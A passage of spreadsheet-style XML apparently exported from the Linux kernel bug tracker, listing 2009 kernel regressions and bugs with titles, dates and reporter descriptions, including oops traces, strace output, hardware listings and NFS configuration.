    <t>Subject : [BUG] i915: drm: xorg leaks drm objects massively: linux-2.6.30-rc{4,5} Submitter : Sergei Trofimovich &lt;slyich@gmail.com&gt; Date : 2009-05-10 19:56 References : http://marc.info/?l=linux-kernel&amp;m=124198547027903&amp;w=4 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>kernel panic -  not syncing : fatel exception in interupt</t>
  </si>
  <si>
    <t>2009-05-13 10:11 UTC</t>
  </si>
  <si>
    <t>2009-05-23 00:02 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.30-rc4 kernel Submitter : rob &lt;rob1@housetosell.net&gt; Date : 2009-05-12 19:34 References : http://marc.info/?l=linux-kernel&amp;m=124216126903309&amp;w=4 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>modprobe ipmi_si hangs under 2.6.30-rc5</t>
  </si>
  <si>
    <t>2009-05-13 10:15 UTC</t>
  </si>
  <si>
    <t>2009-05-23 00:01 UTC</t>
  </si>
  <si>
    <t>Subject : modprobe ipmi_si hangs under 2.6.30-rc5 Submitter : Ferenc Wagner &lt;wferi@niif.hu&gt; Date : 2009-05-12 21:28 References : http://marc.info/?l=linux-kernel&amp;m=124216379407177&amp;w=4 Notify-Also : Corey Minyard &lt;minyard@acm.org&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>bad pmd on fork() of process with hugepage shared memory segments attached</t>
  </si>
  <si>
    <t>2009-05-13 19:54 UTC</t>
  </si>
  <si>
    <t>starlight</t>
  </si>
  <si>
    <t>2012-06-07 10:35 UTC</t>
  </si>
  <si>
    <t>Kernel reports "bad pmd" errors when process with hugepage shared memory segments attached executes fork() system call. Using vfork() avoids the issue. Bug also appears in RHEL5 2.6.18-128.1.6.el5 and causes leakage of huge pages. Bug does not appear in RHEL4 2.6.9-78.0.13.ELsmp. See bug 12134 for an example of the errors reported by 'dmesg'.</t>
  </si>
  <si>
    <t>at76c50x-usb mutex deadlock</t>
  </si>
  <si>
    <t>2009-05-14 20:54 UTC</t>
  </si>
  <si>
    <t>karllinuxtest.relton</t>
  </si>
  <si>
    <t>2010-03-05 18:40 UTC</t>
  </si>
  <si>
    <t>at76_dwork_hw_scan() does a mutex_lock and then calls ieee80211_scan_completed(). This in turn calls at76_config() which then tries to do the same mutex_lock and thus the driver goes into deadlock. I believe the solution would be for at76_dwork_hw_scan() to unlock the mutex before calling ieee80211_scan_completed(). I've tried this with my card, and it does indeed avoid the lockup - though I have yet to get the card working properly with this driver.</t>
  </si>
  <si>
    <t>vm86old oops</t>
  </si>
  <si>
    <t>2.6.30-rc5-git5</t>
  </si>
  <si>
    <t>2009-05-14 21:53 UTC</t>
  </si>
  <si>
    <t>Sergey Senozhatsky</t>
  </si>
  <si>
    <t>2009-06-11 13:14 UTC</t>
  </si>
  <si>
    <t>Created attachment 21359 [details] .config Hello, hardware: ASUS f3jc kernel: 2.6.30-rc5-git5 Kernel built with CONFIG_DEBUG_LOCK_ALLOC=y CONFIG_LOCKDEP=y leads to: [ 14.816002] general protection fault: 0000 [#1] PREEMPT SMP [ 14.816073] last sysfs file: /sys/devices/platform/coretemp.1/temp1_input [ 14.816110] Modules linked in: fuse sbp2 snd_hda_codec_si3054 snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_pcm serio_raw snd_seq_midi psmouse snd_rawmidi snd_seq_midi_event i2c_i801 snd_seq pcspkr snd_timer snd_seq_device rng_core snd evdev asus_laptop soundcore led_class snd_page_alloc usbhid hid sg sr_mod cdrom sd_mod ata_generic pata_acpi ata_piix ohci1394 libata ehci_hcd uhci_hcd r8169 mii ieee1394 scsi_mod ide_pci_generic usbcore [ 14.816636] [ 14.816659] Pid: 2379, comm: vbetool Not tainted (2.6.30-rc5-git5-fb #3) F3JC [ 14.816701] EIP: 0060:[&lt;c018c967&gt;] EFLAGS: 00013286 CPU: 0 [ 14.816738] EIP is at lockdep_sys_exit+0x7/0xa0 [ 14.816769] EAX: f60d6000 EBX: f60d7ed4 ECX: 00000000 EDX: 00000000 [ 14.816805] ESI: c06f53c0 EDI: f6ac42b0 EBP: f60d7ec0 ESP: f60d7eac [ 14.816839] DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 [ 14.816873] Process vbetool (pid: 2379, ti=f60d6000 task=f6ac42b0 task.ti=f60d6000) [ 14.816910] Stack: [ 14.816933] f60d7ec8 c01454cd 00000000 b0c29a68 f60d7ed4 f60d6000 c0128fc8 00000000 [ 14.817024] 00000000 f60d6000 00000000 0000000f 00000000 00000000 00000000 00000000 [ 14.817136] 00004f04 00000000 00000000 00000000 00000000 00000000 0000100a 0000c000 [ 14.817260] Call Trace: [ 14.817283] [&lt;c01454cd&gt;] ? copy_vm86_regs_from_user+0x3d/0x60 [ 14.817329] [&lt;c0128fc8&gt;] ? resume_userspace+0x8/0x28 [ 14.817375] [&lt;c012918c&gt;] ? syscall_call+0x7/0xb [ 14.817415] Code: 89 44 24 08 89 5c 24 04 c7 04 24 0d ff 5c c0 e8 20 51 36 00 eb c0 e8 e9 2e fd ff 89 f6 8d bc 27 00 00 00 00 55 89 e5 53 83 ec 10 &lt;65&gt; a1 14 00 00 00 89 45 f8 31 c0 64 8b 1d 20 30 6f c0 8b 93 b0 [ 14.818042] EIP: [&lt;c018c967&gt;] lockdep_sys_exit+0x7/0xa0 SS:ESP 0068:f60d7eac [ 14.818136] ---[ end trace 15302304171b6ed3 ]--- reproduces with command (for example) vbetool vbemode get strace (vbetool vbemode get): execve("/usr/sbin/vbetool", ["vbetool", "vbemode", "get"], [/* 38 vars */]) = 0 brk(0) = 0x99d5000 access("/etc/ld.so.nohwcap", F_OK) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb8078000 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory) open("/etc/ld.so.cache", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=72327, ...}) = 0 mmap2(NULL, 72327, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb8066000 close(3) = 0 access("/etc/ld.so.nohwcap", F_OK) = 0 open("/usr/lib/libz.so.1", O_RDONLY) = 3 read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260\30\0\0004\0\0\0"..., 512) = 512 fstat64(3, {st_mode=S_IFREG|0644, st_size=82160, ...}) = 0 mmap2(NULL, 84892, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb8051000 mmap2(0xb8065000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x13) = 0xb8065000 close(3) = 0 access("/etc/ld.so.nohwcap", F_OK) = 0 open("/lib/libx86.so.1", O_RDONLY) = 3 read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300\5\0\0004\0\0\0"..., 512) = 512 fstat64(3, {st_mode=S_IFREG|0644, st_size=7712, ...}) = 0 mmap2(NULL, 11884, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb804e000 mmap2(0xb8050000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1) = 0xb8050000 close(3) = 0 access("/etc/ld.so.nohwcap", F_OK) = 0 open("/usr/lib/libpci.so.3", O_RDONLY) = 3 read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0 \30\0\0004\0\0\0"..., 512) = 512 fstat64(3, {st_mode=S_IFREG|0644, st_size=39052, ...}) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb804d000 mmap2(NULL, 37824, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb8043000 mmap2(0xb804c000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x9) = 0xb804c000 close(3) = 0 access("/etc/ld.so.nohwcap", F_OK) = 0 open("/lib/libc.so.6", O_RDONLY) = 3 read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\320h\1\0004\0\0\0"..., 512) = 512 fstat64(3, {st_mode=S_IFREG|0755, st_size=1310924, ...}) = 0 mmap2(NULL, 1316432, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7f01000 mmap2(0xb803d000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x13c) = 0xb803d000 mmap2(0xb8040000, 9808, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb8040000 close(3) = 0 access("/etc/ld.so.nohwcap", F_OK) = 0 open("/lib/libresolv.so.2", O_RDONLY) = 3 read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@&amp;\0\0004\0\0\0"..., 512) = 512 fstat64(3, {st_mode=S_IFREG|0644, st_size=71376, ...}) = 0 mmap2(NULL, 84036, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7eec000 mmap2(0xb7efd000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x10) = 0xb7efd000 mmap2(0xb7eff000, 6212, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7eff000 close(3) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7eeb000 set_thread_area({entry_number:-1 -&gt; 6, base_addr:0xb7eeb6c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, us eable:1}) = 0 open("/dev/urandom", O_RDONLY) = 3 read(3, "Y9e\332", 4) = 4 close(3) = 0 mprotect(0xb7efd000, 4096, PROT_READ) = 0 mprotect(0xb803d000, 8192, PROT_READ) = 0 mprotect(0xb8096000, 4096, PROT_READ) = 0 munmap(0xb8066000, 72327) = 0 open("/dev/zero", O_RDWR) = 3 mmap2(0x1000, 655360, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_FIXED, 3, 0) = 0x1000 close(3) = 0 open("/dev/mem", O_RDWR) = 3 mmap2(NULL, 1282, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_FIXED, 3, 0) = 0 mmap2(0xa0000, 393216, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_FIXED, 3, 0xa0) = 0xa0000 close(3) = 0 iopl(0x3) = 0 brk(0) = 0x99d5000 brk(0x99f6000) = 0x99f6000 access("/sys/bus/pci", R_OK) = 0 vm86old(0xb8050dcc &lt;unfinished ...&gt; +++ killed by SIGSEGV +++ Sergey</t>
  </si>
  <si>
    <t>AGP doesn't work anymore on nforce2</t>
  </si>
  <si>
    <t>2009-05-15 22:17 UTC</t>
  </si>
  <si>
    <t>2009-09-10 22:46 UTC</t>
  </si>
  <si>
    <t>Subject : PROBLEM: 2.6.29.2 - AGP doesn't work anymore on my nforce2 Submitter : Karsten Mehrhoff &lt;kawime@gmx.de&gt; Date : 2009-04-30 8:51 References : http://marc.info/?l=linux-kernel&amp;m=124108156417560&amp;w=4 Handled-By : Shaohua Li &lt;shaohua.li@intel.com&gt; Notify-Also : Jerome Glisse &lt;glisse@freedesktop.org&gt; Notify-Also : Michel Dänzer &lt;michel@daenzer.net&gt; Caused by: commit 59de2bebabc5027f93df999d59cc65df591c3e6e Author: Shaohua Li &lt;shaohua.li@intel.com&gt; Date: Mon Apr 20 10:08:35 2009 +1000 agp: zero pages before sending to userspace AGP pages might be mapped into userspace finally, so the pages should be set to zero before userspace can use it. Otherwise there is potential information leakage. Signed-off-by: Shaohua Li &lt;shaohua.li@intel.com&gt; Signed-off-by: Dave Airlie &lt;airlied@redhat.com&gt; First-Bad-Commit : 59de2bebabc5027f93df999d59cc65df591c3e6e This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>kernel crash with NULL pointer when boot</t>
  </si>
  <si>
    <t>2009-05-16 12:37 UTC</t>
  </si>
  <si>
    <t>2009-05-18 20:33 UTC</t>
  </si>
  <si>
    <t>When booting the system with reiserfs as root it crashes with a NULL pointer (see attachement). Last "working" kernel was 2.6.30-rc5 (which had a regression with xattrs).</t>
  </si>
  <si>
    <t>2.6.30-rc deadline scheduler performance regression for iozone over NFS</t>
  </si>
  <si>
    <t>2009-05-16 21:18 UTC</t>
  </si>
  <si>
    <t>2009-05-29 21:21 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.30-rc deadline scheduler performance regression for iozone over NFS Submitter : Jeff Moyer &lt;jmoyer@redhat.com&gt; Date : 2009-04-23 14:01 References : http://marc.info/?l=linux-kernel&amp;m=124049547915450&amp;w=4 Notify-Also : Jens Axboe &lt;jens.axboe@oracle.com&gt; Notify-Also : Olga Kornievskaia &lt;aglo@citi.umich.edu&gt; Notify-Also : Jim Rees &lt;rees@umich.edu&gt; Notify-Also : Trond Myklebust &lt;trond.myklebust@fys.uio.no&gt; Notify-Also : "J. Bruce Fields" &lt;bfields@fieldses.org&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[PATCH]Null pointer dereference in rtc-cmos driver</t>
  </si>
  <si>
    <t>2009-05-16 21:28 UTC</t>
  </si>
  <si>
    <t>2009-05-30 21:31 UTC</t>
  </si>
  <si>
    <t>Regression: 2.6.30-rc5 and rt2x00 / rt2500pci</t>
  </si>
  <si>
    <t>2009-05-16 21:30 UTC</t>
  </si>
  <si>
    <t>2009-05-18 16:35 UTC</t>
  </si>
  <si>
    <t>Subject : Regression: 2.6.30-rc5 and rt2x00 / rt2500pci Submitter : Ken Lewis &lt;kennylewis@gmail.com&gt; Date : 2009-05-15 14:40 References : http://marc.info/?l=linux-kernel&amp;m=124239988223614&amp;w=4 Handled-By : "John W. Linville" &lt;linville@tuxdriver.com&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>cifs_close: NULL pointer dereference</t>
  </si>
  <si>
    <t>2009-05-16 21:37 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.30-rc6] cifs_close: NULL pointer dereference Submitter : Luca Tettamanti &lt;kronos.it@gmail.com&gt; Date : 2009-05-16 16:28 References : http://marc.info/?l=linux-kernel&amp;m=124249133701702&amp;w=4 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>nfs4 NULL pointer dereference in _nfs4_do_setlk</t>
  </si>
  <si>
    <t>2009-05-17 04:44 UTC</t>
  </si>
  <si>
    <t>2009-06-28 19:05 UTC</t>
  </si>
  <si>
    <t>Created attachment 21380 [details] NFSv4 BUG ON log My NFS server rebooted. The machine with the kernel in question, one of many clients, spit out the attached error in dmesg, and all NFS activity on the machine blocked forever, necessitating a reboot. This is not true on any of the other NFS clients on the network, which vary between 2.6.18 and 2.6.27, so it may be A) 64-bit specific somehow (the rest are 32-bit), B) recently introduced, or C) recently exposed by some existing bad behavior in NFS recovery being removed. Machine was "vanilla" 2.6.30-rc4 (with commits b827e496c893de0c0f142abfaeb8730a2fd6b37f and 7fdf523067666b0eaff330f362401ee50ce187c4 added), 64-bit. NFSv4 mounted with rw,nosuid,nodev,noatime,hard,intr,nolock,sloppy,rsize=8192,wsize=8192,tcp,timeo=600. I'll try reproducing this on latest GIT shortly, but it's hard to reproduce (since it only occurs after the NFS server reboots, and not even consistently then), so I don't know when I'll be able to report back that it occurs or not.</t>
  </si>
  <si>
    <t>FUTEX_LOCK_PI kills kernel</t>
  </si>
  <si>
    <t>2009-05-17 09:51 UTC</t>
  </si>
  <si>
    <t>2009-05-25 23:24 UTC</t>
  </si>
  <si>
    <t>Created attachment 21386 [details] Testcase Calling futex with FUTEX_LOCK_PI crashes the kernel. Reverting e4dc5b7a36a49eff97050894cf1b3a9a02523717 (futex: clean up fault logic) fixes the bug.</t>
  </si>
  <si>
    <t>[post 2.6.29 regression] hang during suspend of b44/b43 modules</t>
  </si>
  <si>
    <t>2009-05-18 10:59 UTC</t>
  </si>
  <si>
    <t>2009-08-27 06:59 UTC</t>
  </si>
  <si>
    <t>Since I switched to 2.6.30 (around -rc4), I have been experiencing hard system hangs (BIOS driven keys not working) during suspend to RAM. These were more or less nondeterministic — I can't provide a series of steps that reproduce it. With PM debugging turned on, I observed that the system hangs when or very soon after the following msgs are printed: ieee80211 phy0: legacy class suspend PM: Removing info for No Bus:hw_random ssb ssb1:1: legacy suspend b44 ssb1:0: legacy suspend I can confirm that rmmodding b44 and b43 before doing echo mem &gt;/sys/power/state fixes the issue completely — I haven't had a single problem since I deployed this workaround. I remove both of those because I observed one hang just after something like "b44: disabling PHY", but then I moved to another place and debugged without an ethernet connection, so the other hangs were (probably) caused by b43 only. If neither b44 nor b43 had been active (as in "have connection", modules alone can be loaded) during system uptime, no hangs occur — that is the only reproduction hint I have. I have a HP Compaq nx7300 notebook. lspci follows: 00:00.0 Host bridge: Intel Corporation Mobile 945GM/PM/GMS, 943/940GML and 945GT Express Memory Controller Hub (rev 03) 00:02.0 VGA compatible controller: Intel Corporation Mobile 945GM/GMS, 943/940GML Express Integrated Graphics Controller (rev 03) 00:02.1 Display controller: Intel Corporation Mobile 945GM/GMS/GME, 943/940GML Express Integrated Graphics Controller (rev 03) 00:1b.0 Audio device: Intel Corporation 82801G (ICH7 Family) High Definition Audio Controller (rev 01) 00:1c.0 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 1 (rev 01) 00:1c.1 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 2 (rev 01) 00:1d.0 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #1 (rev 01) 00:1d.1 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #2 (rev 01) 00:1d.2 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #3 (rev 01) 00:1d.3 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #4 (rev 01) 00:1d.7 USB Controller: Intel Corporation 82801G (ICH7 Family) USB2 EHCI Controller (rev 01) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev e1) 00:1f.0 ISA bridge: Intel Corporation 82801GBM (ICH7-M) LPC Interface Bridge (rev 01) 00:1f.1 IDE interface: Intel Corporation 82801G (ICH7 Family) IDE Controller (rev 01) 00:1f.2 SATA controller: Intel Corporation 82801GBM/GHM (ICH7 Family) SATA AHCI Controller (rev 01) 02:06.0 CardBus bridge: Texas Instruments PCIxx12 Cardbus Controller 02:06.1 FireWire (IEEE 1394): Texas Instruments PCIxx12 OHCI Compliant IEEE 1394 Host Controller 02:0e.0 Ethernet controller: Broadcom Corporation BCM4401-B0 100Base-TX (rev 02) 10:00.0 Network controller: Broadcom Corporation BCM4311 802.11b/g WLAN (rev 01) I will try to attach dmesg output from one of the suspend/resume cycles that didn't go wrong, so that the order of actions is known.</t>
  </si>
  <si>
    <t>Cannot build User Mode Linux</t>
  </si>
  <si>
    <t>2.6.24 to 2.6.29</t>
  </si>
  <si>
    <t>2009-05-19 12:40 UTC</t>
  </si>
  <si>
    <t>vo.sinh</t>
  </si>
  <si>
    <t>2010-01-25 15:08 UTC</t>
  </si>
  <si>
    <t>building environment is Fedora 11 tried last kernel from kernel.org and failed, tried 2.6.28 as in: http://fedorasolved.org/installation-solutions/UML-Linux-Install tried 2.6.24 as in: http://user-mode-linux.sourceforge.net/source.html commands used to build: tar xjf; cd make defconfig ARCH=um make ARCH=um the error: LD .tmp_vmlinux1 /usr/bin/ld:arch/um/kernel/vmlinux.lds:1: ignoring invalid character `#' in expression /usr/bin/ld:arch/um/kernel/vmlinux.lds:1: syntax error collect2: ld returned 1 exit status KSYM .tmp_kallsyms1.S nm: '.tmp_vmlinux1': No such file No valid symbol. make: *** [.tmp_kallsyms1.S] Error 1</t>
  </si>
  <si>
    <t>gelic get_wireless_stats implementation is not atomic</t>
  </si>
  <si>
    <t>2.6.30-rc6-02770-g7ef67c0</t>
  </si>
  <si>
    <t>2009-05-19 13:22 UTC</t>
  </si>
  <si>
    <t>Stijn Tintel</t>
  </si>
  <si>
    <t>2010-03-05 18:44 UTC</t>
  </si>
  <si>
    <t>Created attachment 21427 [details] Kernel config Every time I boot (Gentoo) Linux on my PS3, the following error appears in dmesg: BUG: scheduling while atomic: grep/6390/0x00000002 Modules linked in: rtc_ps3 rtc_core snd_ps3 snd_pcm ps3_gelic ps3rom snd_page_alloc ps3_lpm ps3flash rtc_lib snd_timer ps3vram nfs auth_rpcgss nfs_acl lockd sunrpc usbhid ohci_hcd usb_storage ehci_hcd sr_mod cdrom sg scsi_wait_scan Call Trace: [c000000006f7f470] [c00000000000f680] .show_stack+0x68/0x198 (unreliable) [c000000006f7f520] [c000000000050a84] .__schedule_bug+0x9c/0xa8 [c000000006f7f5b0] [c0000000002f3230] .__schedule+0x440/0x8c8 [c000000006f7f6f0] [c0000000002f36dc] .schedule+0x24/0x50 [c000000006f7f770] [c0000000002f3b5c] .schedule_timeout+0x1a4/0x208 [c000000006f7f860] [c0000000002f2d04] .wait_for_common+0x174/0x1a0 [c000000006f7f930] [d0000000003cad70] .gelic_eurus_sync_cmd+0xa8/0xd8 [ps3_gelic] [c000000006f7f9d0] [d0000000003cccc4] .gelic_wl_get_wireless_stats+0x6c/0xe8 [ps3_gelic] [c000000006f7fa70] [c0000000002f0eec] .wireless_seq_show+0x64/0x158 [c000000006f7fb40] [c00000000010404c] .seq_read+0x394/0x528 [c000000006f7fc30] [c00000000013cda0] .proc_reg_read+0xb0/0x108 [c000000006f7fce0] [c0000000000e2034] .vfs_read+0xec/0x1a8 [c000000006f7fd80] [c0000000000e2208] .SyS_read+0x58/0xc8 [c000000006f7fe30] [c0000000000074b4] syscall_exit+0x0/0x40 gelic_eurus_sync_cmd_worker: cmd issue failed This happens with current ps3-linux.git kernel (2.6.30-rc6-02770-g7ef67c0), but I am seeing this problem since at least 2.6.28. The only kernel I tried that does not have this problem is 2.6.23-ps3 which comes with the Gentoo PS3 install CD. I initially reported this bug on the Gentoo bugzilla at http://bugs.gentoo.org/show_bug.cgi?id=260253, but they suggested to report it here.</t>
  </si>
  <si>
    <t>panic when reading data from IDE CDROM with &gt;= 2.6.29 kernels</t>
  </si>
  <si>
    <t>2009-05-19 21:29 UTC</t>
  </si>
  <si>
    <t>Modestas Vainius</t>
  </si>
  <si>
    <t>2010-01-25 15:09 UTC</t>
  </si>
  <si>
    <t>Created attachment 21439 [details] Backtrace of the OOPS with 2.6.30-rc5 Hello, I get kernel panic when data is read from IDE CDROM with 2.6.29 or later kernels (testing 2.6.30-rc5 at the moment). I have never had the issue with 2.6.28 and earlier kernels. I suspect the cause though. My CD/DVD drive is pretty old and might be a bit faulty (or this might kernel be misinterpreting my drive sometimes). &lt;= 2.6.28 kernels used to turn off DMA due to seek errors (if I recall correctly) sometimes. However, I used to be able to turn DMA back on with hdparm and I have never really had read() failures. Now with &gt;= 2.6.29 I have never seen DMA being turn off on my CD/DVD drive but I guess kernel just panics instead. So I suspect there is a regression in the latest kernels which triggers unrecoverable panic instead of drive reset. I got the attached backtrace (sorry, I couldn't do better than this picture) with 2.6.30-rc5 on Debian unstable amd64 box while doing a simple: $ dd if=/dev/cdrom of=/dev/null bs=1M</t>
  </si>
  <si>
    <t>rpciod produces Invalid Opcode and makes NFS mounts to hang</t>
  </si>
  <si>
    <t>2009-05-19 22:34 UTC</t>
  </si>
  <si>
    <t>Ricardo Sánchez</t>
  </si>
  <si>
    <t>2010-02-03 21:06 UTC</t>
  </si>
  <si>
    <t>I am not sure if this is the right place for reporting this bug, if it is not, please advise where to report it. Also, tell me if more information is needed for debugging. I have a cluster setup with Ubuntu 8.04 LTS server x86_64 version installed. We have 12 nodes, all of them share and mount one scratch directory with and from the rest of the nodes by NFSv4. And all of them mount the /home folder from node1. In all of them we have all the latest security and kernel updates. Our kernel version is: --$ uname -a Linux 2.6.24-24-server #1 SMP Wed Apr 15 15:41:09 UTC 2009 x86_64 GNU/Linux Randomly, in some nodes, we are experiencing a rare kernel bug that seem to hang the hard disk and/or the NFS server (althought I'm not sure of this), and make the nodes to work buggily until restart. Work buggily means that I cannot ssh the nodes as a regular user (because the /home directory is nfs mounted), but I can ssh them as root. Sometimes a soft reboot works and sometimes it doesn't and I have to do a hard reboot. When the bug appears, some nodes present the bug (we believe the nodes with running process), and some other keep working happily (the nodes with no running process). The nodes in which the bug appears, they all fail the same time. The hardware of the nodes that have the bug is not different from the one from the nodes that keep working. When the bug appears, the working nodes can't access the NFS mounts of the buggy nodes. As kern.log shows (pasted below), the kernel bug is related to rpciod (used by NFSv4, I believe), and the cluster processes (most access data by NFS). The kernel bug seems to appear randomly: sometimes the cluster works for week without a problem, and sometimes we get the bug two days in a row. When it appears, we restart the buggy nodes, and they keep working fine until the next time. Here's how we export the home (for the node 1) and scratch directory (for the rest of the nodes): heura1 /etc/exports -------------------- / 192.168.6.0/255.255.255.0(rw,sync,no_subtree_check,fsid=0) /home 192.168.6.0/255.255.255.0(rw,sync,nohide,no_root_squash,no_sub tree_check) /etc/exports heura6 /etc/exports -------------------- / 192.168.6.0/255.255.255.0(rw,sync,fsid=0) /scratch-local 192.168.6.0/255.255.255.0(rw,sync,nohide) Here's how we mount the home and scratch directorys for all of the nodes in /etc/fstab: heura:/home /home nfs4 hard,intr,rsize=32768,wsize=32768 0 0 heura2:/scratch-local /scratch/2 nfs4 hard,intr,rsize=32768,wsize=32768 0 0 Here's the kern.log of the last time the bug occured, in two different nodes. heura6 kern.log --------------- May 19 01:40:45 heura6 kernel: [462902.541017] ------------[ cut here ]------------ May 19 01:40:45 heura6 kernel: [462902.541062] kernel BUG at /build/buildd/linux-2.6.24/net/sunrpc/rpcb_clnt.c:322! May 19 01:40:45 heura6 kernel: [462902.541106] invalid opcode: 0000 [1] SMP May 19 01:40:45 heura6 kernel: [462902.541134] CPU 1 May 19 01:40:45 heura6 kernel: [462902.541156] Modules linked in: autofs4 ipv6 nfs iptable_filter ip_tables x_tables nfsd lockd nfs_acl auth_rpcgss sunrpc exportfs parport_pc lp parport af_packet psmouse serio_raw shpchp iTCO_wdt i5000_edac button iTCO_vendor_support evdev edac_core pci_hotplug pcspkr ext3 jbd mbcache sg sd_mod ata_piix pata_acpi ata_generic libata scsi_mod ehci_hcd uhci_hcd usbcore e1000 raid10 raid456 async_xor async_memcpy async_tx xor raid1 raid0 multipath linear md_mod dm_mirror dm_snapshot dm_mod thermal processor fan fbcon tileblit font bitblit softcursor fuse May 19 01:40:45 heura6 kernel: [462902.541459] Pid: 4397, comm: rpciod/1 Not tainted 2.6.24-24-server #1 May 19 01:40:45 heura6 kernel: [462902.541487] RIP: 0010:[sunrpc:rpcb_getport_async+0x272/0x3c0] [sunrpc:rpcb_getport_async+0x272/0x3c0] :sunrpc:rpcb_getport_async+0x272/0x3c0 May 19 01:40:45 heura6 kernel: [462902.541555] RSP: 0018:ffff810255463e20 EFLAGS: 00010206 May 19 01:40:45 heura6 kernel: [462902.541582] RAX: ffffffff882e45c0 RBX: ffff8102549a4400 RCX: ffff81006c9ba110 May 19 01:40:45 heura6 kernel: [462902.541626] RDX: 00000000ffffff95 RSI: 0000000000000286 RDI: ffff81006c9ba008 May 19 01:40:45 heura6 kernel: [462902.541669] RBP: ffff8102538c5000 R08: 00000000000001f3 R09: 0000000000000001 May 19 01:40:45 heura6 kernel: [462902.541713] R10: 0000000000000003 R11: ffffffff882c6640 R12: ffff8102549a4a00 May 19 01:40:45 heura6 kernel: [462902.541756] R13: ffff81006c9ba008 R14: 0000000000000000 R15: 0000000000000000 May 19 01:40:45 heura6 kernel: [462902.541800] FS: 0000000000000000(0000) GS:ffff810257401800(0000) knlGS:0000000000000000 May 19 01:40:45 heura6 kernel: [462902.541846] CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b May 19 01:40:45 heura6 kernel: [462902.541873] CR2: 00000000f7bd4000 CR3: 00000002554ed000 CR4: 00000000000006e0 May 19 01:40:45 heura6 kernel: [462902.541916] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 May 19 01:40:45 heura6 kernel: [462902.541960] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 May 19 01:40:45 heura6 kernel: [462902.542004] Process rpciod/1 (pid: 4397, threadinfo ffff810255462000, task ffff8102559a4000) May 19 01:40:45 heura6 kernel: [462902.542050] Stack: 0000000000000000 ffffffff882bdf60 0000000000000286 ffff81006c9ba098 May 19 01:40:45 heura6 kernel: [462902.542103] 0000000000000000 ffff81006c9ba008 ffff810255c2cb80 ffff81006c9ba0f8 May 19 01:40:45 heura6 kernel: [462902.542154] 0000000000000000 ffffffff882bdb3b ffffffffffffffff ffff810255c2cb80 May 19 01:40:45 heura6 kernel: [462902.542188] Call Trace: May 19 01:40:45 heura6 kernel: [462902.542237] [nfs:rpc_sleep_on+0x150/0x2b0] 